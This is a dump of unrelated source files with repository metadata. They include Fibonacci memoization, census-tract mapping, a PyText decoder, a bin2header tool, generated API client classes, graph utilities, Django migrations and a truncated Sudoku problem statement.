9af2d6144e247168e492ddfb9af5d4a5667227c4
|
a6e0456dd0b216b96829b5c3cef11df706525867
|
refs/heads/master
| 2023-03-19T09:21:31.234000
| 2020-10-09T13:09:38
| 2020-10-09T13:09:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 484
|
py
|
def memoize(f):
memo = {}
def helper(x):
if x not in memo:
memo[x] = f(x)
return memo[x]
return helper
@memoize
def fib(n):
if n == 0:
return 0
elif n == 1:
return 1
else:
return fib(n-1) + fib(n-2)
def fib_seq(n):
res = []
if n > 0:
res.extend(fib_seq(n-1))
res.append(fib(n))
return res
if __name__ == "__main__":
fib_seq(30)
import cProfile
cProfile.run('fib_seq(30)')
|
[
"root@lyzdeMacBook.local"
] |
root@lyzdeMacBook.local
|
94f28c8e8785258f7272399beffdb289c6c802c0
|
035f7cbf8a16d2936b3df13c3966e954c6b6a13a
|
/lab/soc_module.py
|
e91f1b4bcb8ea1ab10d5cadb5d859c11f9bb6aed
|
[
"BSD-3-Clause"
] |
permissive
|
2i2c-org/utoronto-demo
|
84d043b446f4c8ed5f5375175ac482deba8c2955
|
8e2cd4a9f04e3399bc2437e95975c80f5899cef1
|
refs/heads/master
| 2022-11-13T11:12:33.333581
| 2020-07-07T17:00:24
| 2020-07-07T17:00:24
| 277,604,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,475
|
py
|
import pandas as pd
import os
import folium
import geojson
import random
import numpy as np
from sklearn import preprocessing
import re
from geopy.geocoders import Nominatim
import time
import certifi
import ssl
import geopy.geocoders
# ctx = ssl.create_default_context(cafile=certifi.where())
# geopy.geocoders.options.default_ssl_context = ctx
def html_popup(title, comment, imgpath, data):
"""Format the image data into html.
:params title, comment, imgpath, data: strings"""
html = """
<h3>TITLE</h3>
<img
src = IMGPATH
style="width:180px;height:128px;"
>
<p>
"COMMENT"
</p>
<p>
DATA
</p>
"""
html = html.replace(
"TITLE",
title).replace(
"COMMENT",
comment).replace(
"IMGPATH",
imgpath).replace(
"DATA",
data)
return html
def fix_tract(t):
"""Clean up census tract names.
:param t: Series of string tract names
:returns: Series of cleaned tract names
"""
if type(t) == str:
return t
return str(t).rstrip("0").rstrip(".")
def get_coords(data, alameda, user_agent):
"""Get the geographical coordinates (latitude and longitude) of a
list of street addresses.
:param data: DataFrame with student responses from Google form
:param alameda: GeoJSON data for Alameda county
:user_agent: string user agent for OpenStreetMap
:returns: "data" dataframe with appended column of coordinates
"""
tracts = folium.features.GeoJson(alameda)
tract_centroids = get_centroids(alameda)
data['Census Tract'] = data['Census Tract'].apply(fix_tract)
for j in np.arange(1, 6):
image_coords = []
for i, row in data.iterrows():
tract = row['Census Tract']
if not pd.isnull(row['Full Address of Block Face in Image #' + str(j) + ' (Street Number, Street Name, City, State, Zip Code). E.g.: 2128 Oxford Street, Berkeley, CA, 94704.']):
address = row['Full Address of Block Face in Image #' + str(j) + ' (Street Number, Street Name, City, State, Zip Code). E.g.: 2128 Oxford Street, Berkeley, CA, 94704.']
geocoder = Nominatim(user_agent=user_agent, timeout=3)
loc = geocoder.geocode(address)
if loc is None :
if len(tract) == 3:
tract += "0"
coords = tract_centroids[tract]
else:
coords = [loc.latitude, loc.longitude]
image_coords.append(coords)
elif not pd.isnull(row['Image #' + str(j)]):
image_coords.append(tract_centroids[tract])
else:
image_coords.append('NaN')
time.sleep(0.5)
data['Image #' + str(j)+ ' coordinates'] = image_coords
return data
def get_centroids(geojson):
"""Get census tract centroids.
:param geojson: a GeoJSON file with census tract location data
:returns: a dictionary with tract names mapped to coordinate tuples"""
tract_centroids = {}
for t in geojson['features']:
lat = t['properties']['intptlat10']
lon = t['properties']['intptlon10']
name = t['properties']['name10']
tract_centroids[name] = (float(lat), float(lon))
return tract_centroids
def map_data(myMap, alameda, obs_data):
"""Map student observations.
:param myMap: Folium Map object
:param alameda: GeoJSON of alameda county census tracts
:param obs_data: DataFrame image addresses and coordinates
:returns: Folium Map object with markers for student data
"""
# add tract outlines
tracts = folium.features.GeoJson(alameda)
tract_centroids = get_centroids(alameda)
myMap.add_child(tracts)
# transfer Table to pandas
obs_data = obs_data.to_df()
for t in list(set(set(obs_data['Census Tract']))):
subset = obs_data[obs_data['Census Tract'] == t]
markers = []
popups = []
for i, row in subset.iterrows():
for j in np.arange(1, 6):
if not pd.isnull(row['Image #' + str(j)]):
try:
image_url = row['Image #' + str(j)].replace(
"open?", "uc?export=download&")
except:
image_url = "NA"
coords = [float(coords) for coords in re.findall('-?[0-9]+.[0-9]+', row['Image #' + str(j) + ' coordinates'])]
# if there aren't coords of format [lat, lon] the loop skips this iteration
if len(coords) != 2:
continue
tract = str(row['Census Tract'])
comment = row["Other thoughts or comments for Image #" + str(j)]
if not isinstance(comment, str):
comment = "NA"
data = np.mean([row[i] for i in range(5, 14)
if type(row[i]) in [int, float]])
html = html_popup(
title="Tract: " + tract,
comment=comment,
imgpath=image_url,
data="")
popup = folium.Popup(
folium.IFrame(
html=html,
width=200,
height=300),
max_width=2650
)
markers += [coords]
popups += [popup]
marker_cluster = folium.plugins.MarkerCluster(locations=markers, popups=popups).add_to(myMap)
return myMap
def minmax_scale(x):
"""Scales values in array to range (0, 1)
:param x: array of values to scale
"""
if min(x) == max(x):
return x * 0
return (x - min(x)) / (max(x) - min(x))
def scale_values(tbl, columns):
"""Scale values in a dataframe using MinMax scaling.
:param tbl: Table
:param columns: iterable with names of columns to be scaled
:returns: Table with scaled columns
"""
new_tbl = tbl.copy()
for col in columns:
name = new_tbl.labels[col]
x_scaled = minmax_scale(new_tbl[name])
new_tbl[name] = x_scaled
return new_tbl
# NO LONGER USED as of Fall 2018
def choropleth_overlay(mapa, column_name, joined, alameda):
"""Add a choropleth overlay to a map.
:param mapa: Folium Map object
:param column_name: string column name with data to overlay
:param joined:
:param alameda: GeoJSON Alameda county census tract data
:returns: mapa with a chloropleth overlay
"""
# add tract outlines
tracts = folium.features.GeoJson(alameda)
tract_centroids = get_centroids(alameda)
mapa.add_child(tracts)
threshold_scale = np.linspace(
joined[column_name].min(),
joined[column_name].max(),
6,
dtype=float).tolist()
mapa = folium.Map(location=(37.8044, -122.2711), zoom_start=11)
mapa.choropleth(geo_data=alameda,
data=joined,
columns=['Census Tract', column_name],
fill_color='YlOrRd',
key_on='feature.properties.name10',
threshold_scale=threshold_scale)
return mapa
|
[
"choldgraf@berkeley.edu"
] |
choldgraf@berkeley.edu
|
78c4520f26fc5a405e8b5516a71476aa9983b266
|
61f9c7094be028e040d1234f05ee6d7370c2206d
|
/pytext/models/decoders/mlp_decoder_n_tower.py
|
6e2e0c6810eef0ce327e48063f8f785200ccca9b
|
[
"BSD-3-Clause"
] |
permissive
|
timgates42/pytext
|
3ce5473fecca5174108a4eb63209a3eecfb6d8dd
|
5f2c3ca6c3ba56e1001e95825abd7ee295de1dff
|
refs/heads/main
| 2023-03-15T07:33:21.217159
| 2022-07-11T16:06:16
| 2022-07-11T16:06:16
| 231,028,915
| 0
| 0
|
NOASSERTION
| 2019-12-31T05:04:01
| 2019-12-31T05:04:00
| null |
UTF-8
|
Python
| false
| false
| 3,970
|
py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import List
import torch
import torch.nn as nn
from pytext.config.module_config import Activation
from pytext.models.decoders.decoder_base import DecoderBase
from pytext.optimizer import get_activation
from pytext.utils import precision
from pytext.utils.usage import log_class_usage
# Export types are now ints
# -1 represents ExportType.None
# eg: to export from tower 0, set your export type to 0
#
class MLPDecoderNTower(DecoderBase):
"""
Implements an 'n-tower' MLPDecoder
"""
class Config(DecoderBase.Config):
# Intermediate hidden dimensions
tower_specific_hidden_dims: List[List[int]] = []
hidden_dims: List[int] = []
layer_norm: bool = False
dropout: float = 0.0
activation: Activation = Activation.RELU
def __init__(
self,
config: Config,
tower_dims: List[int],
to_dim: int,
export_type=-1,
) -> None:
super().__init__(config)
for i in range(len(tower_dims)):
setattr(
self,
f"tower_mlp_{i}",
MLPDecoderNTower.get_mlp(
tower_dims[i],
0,
config.tower_specific_hidden_dims[i],
config.layer_norm,
config.dropout,
config.activation,
export_embedding=True,
),
)
from_dim = 0
for dims in config.tower_specific_hidden_dims:
from_dim += dims[-1]
self.mlp = MLPDecoderNTower.get_mlp(
from_dim,
to_dim,
config.hidden_dims,
config.layer_norm,
config.dropout,
config.activation,
)
self.out_dim = to_dim
self.export_type = export_type
log_class_usage
@staticmethod
def get_mlp(
from_dim: int,
to_dim: int,
hidden_dims: List[int],
layer_norm: bool,
dropout: float,
activation: Activation,
export_embedding: bool = False,
):
layers = []
for i in range(len(hidden_dims)):
dim = hidden_dims[i]
layers.append(nn.Linear(from_dim, dim, True))
# Skip ReLU, LayerNorm, and dropout for the last layer if export_embedding
if not (export_embedding and i == len(hidden_dims) - 1):
layers.append(get_activation(activation))
if layer_norm:
layers.append(nn.LayerNorm(dim))
if dropout > 0:
layers.append(nn.Dropout(dropout))
from_dim = dim
if to_dim > 0:
layers.append(nn.Linear(from_dim, to_dim, True))
return nn.Sequential(*layers)
def forward(self, *x: List[torch.Tensor]) -> torch.Tensor:
# as per the associated model's arrange_model_inputs()
# first half of the list is the token inputs, the second half is the dense features
halfway = len(x) // 2
outputs = []
for i in range(halfway):
if self.export_type == i or self.export_type == -1:
tensor = (
torch.cat((x[i], x[halfway + i]), 1).half()
if precision.FP16_ENABLED
else torch.cat((x[i], x[halfway + i]), 1).float()
)
# len(tensor i) == i's encoder.embedding_dim + i's dense_dim
output = getattr(self, f"tower_mlp_{i}")(tensor)
outputs.append(output)
if self.export_type == i:
return output
return self.mlp(torch.cat(outputs, 1))
def get_decoder(self) -> List[nn.Module]:
return [
getattr(self, f"tower_mlp_{i}")
for i in range(len(self.tower_specific_hidden_dims))
]
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
3574d97da998084641fea6ef4eeadcf842506678
|
0682577346d5be6452f93e17cf06df70acb95135
|
/src/bin2header.py
|
4755e84c32cb3efc4ebf88c35ecbf0cdd727554f
|
[
"MIT"
] |
permissive
|
cenit/bin2header
|
c8bf30cf371378a7f31c4eef37ffbe228fa41638
|
9860f292a0a109a1b999dd3cafe07fdb952a1e18
|
refs/heads/dev/msvc
| 2023-04-18T02:12:04.133748
| 2021-03-24T19:22:18
| 2021-03-24T20:59:12
| 340,431,411
| 0
| 0
|
MIT
| 2021-05-02T08:15:26
| 2021-02-19T16:47:07
|
C++
|
UTF-8
|
Python
| false
| false
| 3,545
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2019 Jordan Irwin (AntumDeluge) <antumdeluge@gmail.com>
#
# This file is part of the bin2header project & is distributed under the
# terms of the MIT/X11 license. See: LICENSE.txt
import sys, os, array
if sys.version_info.major < 3:
print('\nERROR: Python ' + str(sys.version_info.major) + ' not supported. Please upgrade to Python 3.\n')
sys.exit(2)
__WIN32__ = 'windows' in os.getenv('OS').lower();
version = '0.1.2'
## Normalizes the path for they current system
def NormalizePath(path):
new_path = path
to_replace = '\\'
replace_with = '/'
if __WIN32__:
to_replace = '/'
replace_with = '\\'
new_path = new_path.replace(to_replace, replace_with)
if __WIN32__:
# MSYS2/MinGW paths
if new_path.lower().startswith('\\c\\'):
new_path = 'C:{}'.format(new_path[2:])
return new_path;
def GetBaseName(f):
base_name = os.path.basename(f)
# MSYS versions of Python appear to not understand Windows paths
if __WIN32__ and '\\' in base_name:
base_name = base_name.split('\\')[-1]
return base_name
def GetDirName(f):
dir_name = os.path.dirname(f)
# MSYS versions of Python appear to not understand Windows paths
if not dir_name and __WIN32__:
dir_name = '\\'.join(f.split('\\')[:-1])
return dir_name
def PrintUsage():
executable = os.path.basename(__file__)
print('\nbin2header version {} (Python)\nCopyright © 2019 Jordan Irwin <antumdeluge@gmail.com>\n\n\tUsage:\t{} <file>\n'.format(version, executable))
def main(argv):
source_file = NormalizePath(argv[1])
# Check if file exists
if not os.path.isfile(source_file):
print('\nFile "{}" does not exist'.format(source_file))
PrintUsage()
sys.exit(1)
### Get filenames and target directory ###
filename = list(GetBaseName(source_file))
hname = list(filename)
target_dir = GetDirName(source_file)
### Remove Unwanted Characters ###
badchars = ('\\', '+', '-', '*', ' ')
for x in range(len(hname)):
if hname[x] in badchars or hname[x] == '.':
hname[x] = '_'
if filename[x] in badchars:
filename[x] = '_'
filename = ''.join(filename)
hname = ''.join(hname)
target_file = os.path.join(target_dir, filename) + '.h'
### Uppercase Name for Header ###
hname_upper = hname.upper()
hname_upper += '_H'
### Read Data In ###
data = array.array('B', open(source_file, 'rb').read())
### START Read Data Out to Header ###
# adds C++ std::vector support
# TODO: make optional
store_vector = True
# currently only support LF line endings output
outfile = open(target_file, 'w', newline='\n')
text = '#ifndef {0}\n#define {0}\n'.format(hname_upper)
if store_vector:
text += '\n#ifdef __cplusplus\n#include <vector>\n#endif\n'
text += '\nstatic const unsigned char {}[] = {{\n'.format(hname)
current = 0
data_length = len(data)
for byte in data:
if (current % 12) == 0:
text += ' '
text += '0x%02x' % byte
if (current + 1) < data_length:
text += ', '
if (current % 12) == 11:
text += '\n'
current += 1
text += '\n};\n'
if store_vector:
text += '\n#ifdef __cplusplus\nstatic const std::vector<char> ' \
+ hname + '_v(' + hname + ', ' + hname + ' + sizeof(' + hname \
+ '));\n#endif\n'
text +='\n#endif /* {} */\n'.format(hname_upper)
outfile.write(text)
outfile.close()
### END Read Data Out to Header ###
print('Exported to: {}'.format(target_file))
return 0
if __name__ == '__main__':
if len(sys.argv) < 2:
print('\nERROR: Missing <file> argument')
PrintUsage()
sys.exit(1)
main(sys.argv)
|
[
"antumdeluge@gmail.com"
] |
antumdeluge@gmail.com
|
021380e13d2eae318fc3807aa19a45be981051fb
|
e20ed90b9be7a0bcdc1603929d65b2375a224bf6
|
/generated-libraries/python/netapp/lun/lun_stats_get_iter_key_td.py
|
b900171ae83a9786718d2f883283ee90bf322dc9
|
[
"MIT"
] |
permissive
|
radekg/netapp-ontap-lib-gen
|
530ec3248cff5ead37dc2aa47ced300b7585361b
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
refs/heads/master
| 2016-09-06T17:41:23.263133
| 2015-01-14T17:40:46
| 2015-01-14T17:40:46
| 29,256,898
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,238
|
py
|
from netapp.netapp_object import NetAppObject
class LunStatsGetIterKeyTd(NetAppObject):
"""
Key typedef for table lunStats
"""
_key_3 = None
@property
def key_3(self):
"""
Field qtree
"""
return self._key_3
@key_3.setter
def key_3(self, val):
if val != None:
self.validate('key_3', val)
self._key_3 = val
_key_2 = None
@property
def key_2(self):
"""
Field volume
"""
return self._key_2
@key_2.setter
def key_2(self, val):
if val != None:
self.validate('key_2', val)
self._key_2 = val
_key_1 = None
@property
def key_1(self):
"""
Field path
"""
return self._key_1
@key_1.setter
def key_1(self, val):
if val != None:
self.validate('key_1', val)
self._key_1 = val
_key_0 = None
@property
def key_0(self):
"""
Field vserver
"""
return self._key_0
@key_0.setter
def key_0(self, val):
if val != None:
self.validate('key_0', val)
self._key_0 = val
_key_4 = None
@property
def key_4(self):
"""
Field lun
"""
return self._key_4
@key_4.setter
def key_4(self, val):
if val != None:
self.validate('key_4', val)
self._key_4 = val
@staticmethod
def get_api_name():
return "lun-stats-get-iter-key-td"
@staticmethod
def get_desired_attrs():
return [
'key-3',
'key-2',
'key-1',
'key-0',
'key-4',
]
def describe_properties(self):
return {
'key_3': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'key_2': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'key_1': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'key_0': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'key_4': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
|
[
"radek@gruchalski.com"
] |
radek@gruchalski.com
|
6080e8e27370523a1a15d482bd31e6589aa63cc2
|
1c5f4a13a5d67201b3a21c6e61392be2d9071f86
|
/.VirtualEnv/Lib/site-packages/influxdb_client/domain/variable_assignment.py
|
f36ac8c683bd2b04ca15fcea617fca76518bfe9c
|
[] |
no_license
|
ArmenFirman/FastAPI-InfluxDB
|
19e3867c2ec5657a9428a05ca98818ca7fde5fd0
|
b815509c89b5420f72abf514562e7f46dcd65436
|
refs/heads/main
| 2023-06-24T20:55:08.361089
| 2021-07-29T00:11:18
| 2021-07-29T00:11:18
| 390,462,832
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,256
|
py
|
# coding: utf-8
"""
Influx OSS API Service.
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from influxdb_client.domain.statement import Statement
class VariableAssignment(Statement):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'id': 'Identifier',
'init': 'Expression'
}
attribute_map = {
'type': 'type',
'id': 'id',
'init': 'init'
}
def __init__(self, type=None, id=None, init=None): # noqa: E501,D401,D403
"""VariableAssignment - a model defined in OpenAPI.""" # noqa: E501
Statement.__init__(self) # noqa: E501
self._type = None
self._id = None
self._init = None
self.discriminator = None
if type is not None:
self.type = type
if id is not None:
self.id = id
if init is not None:
self.init = init
@property
def type(self):
"""Get the type of this VariableAssignment.
Type of AST node
:return: The type of this VariableAssignment.
:rtype: str
""" # noqa: E501
return self._type
@type.setter
def type(self, type):
"""Set the type of this VariableAssignment.
Type of AST node
:param type: The type of this VariableAssignment.
:type: str
""" # noqa: E501
self._type = type
@property
def id(self):
"""Get the id of this VariableAssignment.
:return: The id of this VariableAssignment.
:rtype: Identifier
""" # noqa: E501
return self._id
@id.setter
def id(self, id):
"""Set the id of this VariableAssignment.
:param id: The id of this VariableAssignment.
:type: Identifier
""" # noqa: E501
self._id = id
@property
def init(self):
"""Get the init of this VariableAssignment.
:return: The init of this VariableAssignment.
:rtype: Expression
""" # noqa: E501
return self._init
@init.setter
def init(self, init):
"""Set the init of this VariableAssignment.
:param init: The init of this VariableAssignment.
:type: Expression
""" # noqa: E501
self._init = init
def to_dict(self):
"""Return the model properties as a dict."""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Return the string representation of the model."""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`."""
return self.to_str()
def __eq__(self, other):
"""Return true if both objects are equal."""
if not isinstance(other, VariableAssignment):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Return true if both objects are not equal."""
return not self == other
|
[
"42990136+ArmenFirman@users.noreply.github.com"
] |
42990136+ArmenFirman@users.noreply.github.com
|
5137a2d0697ff6d46bc41528064261cdc36a3fcc
|
6a2a4f97009e31e53340f1b4408e775f3051e498
|
/Iniciante/p2031.py
|
89cb880da36fcb459e803f82f4d976c547bff06d
|
[] |
no_license
|
rafacasa/OnlineJudgePythonCodes
|
34c31f325cccb325f074492b40591ad880175816
|
030c18f9020898fdc4f672f9cc17723236e1271d
|
refs/heads/master
| 2023-07-15T12:09:45.534873
| 2023-06-27T00:24:03
| 2023-06-27T00:24:03
| 250,595,994
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
qtd = int(input())
for i in range(qtd):
j1 = input()
j2 = input()
if j1 == 'ataque':
if j2 == 'ataque':
print('Aniquilacao mutua')
continue
else:
print('Jogador 1 venceu')
continue
if j1 == 'pedra':
if j2 == 'ataque':
print('Jogador 2 venceu')
continue
if j2 == 'pedra':
print('Sem ganhador')
continue
if j2 == 'papel':
print('Jogador 1 venceu')
continue
if j1 == 'papel':
if j2 == 'papel':
print('Ambos venceram')
continue
else:
print('Jogador 2 venceu')
continue
|
[
"rafaelluizcasa@gmail.com"
] |
rafaelluizcasa@gmail.com
|
c945c8268924f58b87f20e45705848eca360c58a
|
59a688e68421794af64bfe69a74f64b2c80cd79d
|
/graph_theory/utils_graph_theory.py
|
fd125946005681bf4598d211b4d0027d1ecc27c5
|
[] |
no_license
|
hearues-zueke-github/python_programs
|
f23469b306e057512aadecad0ca0a02705667a15
|
d24f04ca143aa93f172210a4b9dfdd9bf1b79a15
|
refs/heads/master
| 2023-07-26T00:36:56.512635
| 2023-07-17T12:35:16
| 2023-07-17T12:35:16
| 117,093,746
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,290
|
py
|
import numpy as np
# hamilton cycles
def get_cycles_of_1_directed_graph(l_edges_directed):
nodes_from, nodes_to = list(zip(*l_edges_directed))
all_nodes = sorted(set(nodes_from+nodes_to))
unique_nodes_from, counts = np.unique(nodes_from, return_counts=True)
assert np.all(counts==1)
edges_directed_dict = {n1: n2 for n1, n2 in l_edges_directed}
all_available_nodes = set(all_nodes)
list_of_cycles = []
while len(all_available_nodes) > 0:
node_now = all_available_nodes.pop()
lst_nodes = [node_now]
is_found_cycle = False
while True:
node_next = edges_directed_dict[node_now]
node_now = node_next
if not node_next in all_available_nodes:
if node_next in lst_nodes:
lst_nodes = lst_nodes[lst_nodes.index(node_next):]
argmin = np.argmin(lst_nodes)
lst_nodes = lst_nodes[argmin:]+lst_nodes[:argmin]
is_found_cycle = True
break
lst_nodes.append(node_next)
all_available_nodes.remove(node_next)
if is_found_cycle:
list_of_cycles.append(lst_nodes)
list_of_cycles_sorted = sorted(list_of_cycles, key=lambda x: (len(x), x))
return list_of_cycles_sorted
def write_digraph_as_dotfile(path, arr_x, arr_y):
with open(path, 'w') as f:
f.write('digraph {\n')
for x in arr_x:
f.write(f' x{x}[label="{x}"];\n')
f.write('\n')
for x, y in zip(arr_x, arr_y):
f.write(f' x{x} -> x{y};\n')
f.write('}\n')
# d_node_pair_edge = {(0, 1): 2, ...}
# Node 0 to Node 1 with the Edge 2, etc.
# def write_many_digraph_as_dotfile(path, node_from, node_to):
def write_many_digraph_edges_as_dotfile(path, d_node_pair_edge):
with open(path, 'w') as f:
f.write('digraph {\n')
for x in sorted(set(list(map(lambda x: x[0], d_node_pair_edge.keys())))):
f.write(f' x{x}[label="{x}"];\n')
f.write('\n')
for (n1, n2), e in d_node_pair_edge.items():
# for x, y in zip(node_from, node_to):
f.write(f' x{n1} -> x{n2} [label="{e}"];\n')
# f.write(f' x{x} -> x{y} [label="{e}"];\n')
f.write('}\n')
|
[
"hziko314@gmail.com"
] |
hziko314@gmail.com
|
61987d03b4832d555efd81438653636012699b92
|
4da9c19d9839c670fda30a45a7e223da624eee4a
|
/Codechef Problem solutions/lapindromes.py
|
9070865b0cf0bb49ceaf98a28dcc869c6166e819
|
[] |
no_license
|
JineshKamdar98/Codchef-Problem-Solutions
|
3e1737669cc0657ccc224e06f800b587130f5787
|
4447679aa3fb45a2d57f93bf3f724f6223049506
|
refs/heads/master
| 2020-05-05T06:38:10.306619
| 2019-04-06T06:16:10
| 2019-04-06T06:16:10
| 179,795,902
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 197
|
py
|
t=int(input())
while(t!=0):
s=input()
p=list(s[:len(s)//2])
q=list(s[-(len(s)//2):])
if(sorted(p)==sorted(q)):
print('YES')
else:
print('NO')
t-=1
|
[
"noreply@github.com"
] |
JineshKamdar98.noreply@github.com
|
111dbc26616d818e6e15afdd77e8e66d50541599
|
4bd5e9b67d98bfcc9611bd8b774c9ab9f4f4d446
|
/Python基础笔记/12/代码/1.类的定义.py
|
611f8b67880c998961906ccb1093d893e099e0c3
|
[] |
no_license
|
zhenguo96/test1
|
fe21510aea7feb674e52fd7a86d4177666f841c5
|
0d8de7e73e7e635d26462a0bc53c773d999498be
|
refs/heads/master
| 2020-05-03T13:09:53.592103
| 2019-04-06T07:08:47
| 2019-04-06T07:08:47
| 178,646,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,325
|
py
|
"""
类:人
属性(静态特征):
姓名
性别
年龄
行为(动态特征):
吃饭
睡觉
打豆豆
"""
"""
1.类名命名规范:
数字、字符、下划线组成、不能以数字开头
不能是保留字
区分大小写
2.命名风格:大驼峰:每个单词首字母大写
3.类体:以冒号开头,必须缩进
"""
class Person:
# 构造方法
"""
方法和函数的区别: 方法第一个参数必须是self,函数没有self
方法定义在类中,作用域属于类,可以和函数重名
方法必须通过对象调用 对象.方法()
"""
def __init__(self):
# 成员属性定义在构造函数中
# self.属性名 = 属性值
self.name = '我'
self.age = 5
self.sex = '男'
# 行为:
def eat(self):
print("吃饭")
def sleepiing(self):
print("睡觉")
def da_doudou(self):
print("打豆豆")
# 实例化对象:类名()
doudou = Person()
print(doudou,type(doudou))
# 调用属性:对象.属性
print(doudou.name,doudou.age)
# 调用方法:对象.方法()
doudou.eat()
doudou.sleepiing()
doudou.da_doudou()
|
[
"1148421588@qq.com"
] |
1148421588@qq.com
|
bfdc184ec6e550e1526742ddaa73ce54cdbabee9
|
b509b4c3ba811ee5cbbc8ae5a580c78dc66c3437
|
/backend/vehicle/migrations/0001_initial.py
|
d442d5d68a3d15410380299dcfa2ac14cffe213f
|
[] |
no_license
|
crowdbotics-apps/application-24933
|
d0a35800eee010daebae321e321e9f906cbc2e4a
|
dadd878c63f6d74f4f57d9a04eec818d77ba3595
|
refs/heads/master
| 2023-03-13T22:34:01.776842
| 2021-03-09T16:02:32
| 2021-03-09T16:02:32
| 346,061,385
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,549
|
py
|
# Generated by Django 2.2.19 on 2021-03-09 16:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('taxi_profile', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='VehicleType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('icon', models.URLField()),
('base_rate', models.FloatField()),
],
),
migrations.CreateModel(
name='Vehicle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type_description', models.CharField(max_length=255)),
('plate_number', models.CharField(max_length=10)),
('timestamp_registered', models.DateTimeField(auto_now_add=True)),
('is_on_duty', models.BooleanField(blank=True, null=True)),
('driver', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='vehicle_driver', to='taxi_profile.DriverProfile')),
('vehicle_type', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='vehicle_vehicle_type', to='vehicle.VehicleType')),
],
),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
fbe04451994e0024a6b2f42914705abc22316a48
|
d88360329b36f9c9fd7ee7efb118d45f7dc44f5e
|
/backend/api/apps.py
|
c33832e843d3833d7b2d6cddd0f32158ebcdc0e6
|
[] |
no_license
|
hyunmin0317/Study-App
|
265a19723010b3150eac41fbaea7aa6f229e6140
|
32835258ec6ce0a981f2a359776e944b52adde81
|
refs/heads/master
| 2023-07-17T23:36:55.645573
| 2021-09-08T06:33:54
| 2021-09-08T06:33:54
| 398,130,964
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
from django.apps import AppConfig
class ApiConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'api'
|
[
"choihm9903@naver.com"
] |
choihm9903@naver.com
|
bb19442ce68445b7d0832bfe6249aa389dff37a8
|
a8123a86db99b9365b10ba76dd509d58caa7bc10
|
/python/practice/start_again/2023/07252023/valid_sudoku.py
|
bace8ea77bfaad4e5b056c4e5d44463b4ad85bc9
|
[] |
no_license
|
smohapatra1/scripting
|
c0404081da8a10e92e7c7baa8b540acc16540e77
|
3628c9109204ad98231ae8ee92b6bfa6b27e93cd
|
refs/heads/master
| 2023-08-22T20:49:50.156979
| 2023-08-22T20:43:03
| 2023-08-22T20:43:03
| 147,619,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,506
|
py
|
# 36. Valid Sudoku
# Determine if a 9 x 9 Sudoku board is valid. Only the filled cells need to be validated according to the following rules:
# Each row must contain the digits 1-9 without repetition.
# Each column must contain the digits 1-9 without repetition.
# Each of the nine 3 x 3 sub-boxes of the grid must contain the digits 1-9 without repetition.
# Note:
# A Sudoku board (partially filled) could be valid but is not necessarily solvable.
# Only the filled cells need to be validated according to the mentioned rules.
# Example 1:
# Input: board =
# [["5","3",".",".","7",".",".",".","."]
# ,["6",".",".","1","9","5",".",".","."]
# ,[".","9","8",".",".",".",".","6","."]
# ,["8",".",".",".","6",".",".",".","3"]
# ,["4",".",".","8",".","3",".",".","1"]
# ,["7",".",".",".","2",".",".",".","6"]
# ,[".","6",".",".",".",".","2","8","."]
# ,[".",".",".","4","1","9",".",".","5"]
# ,[".",".",".",".","8",".",".","7","9"]]
# Output: true
# Example 2:
# Input: board =
# [["8","3",".",".","7",".",".",".","."]
# ,["6",".",".","1","9","5",".",".","."]
# ,[".","9","8",".",".",".",".","6","."]
# ,["8",".",".",".","6",".",".",".","3"]
# ,["4",".",".","8",".","3",".",".","1"]
# ,["7",".",".",".","2",".",".",".","6"]
# ,[".","6",".",".",".",".","2","8","."]
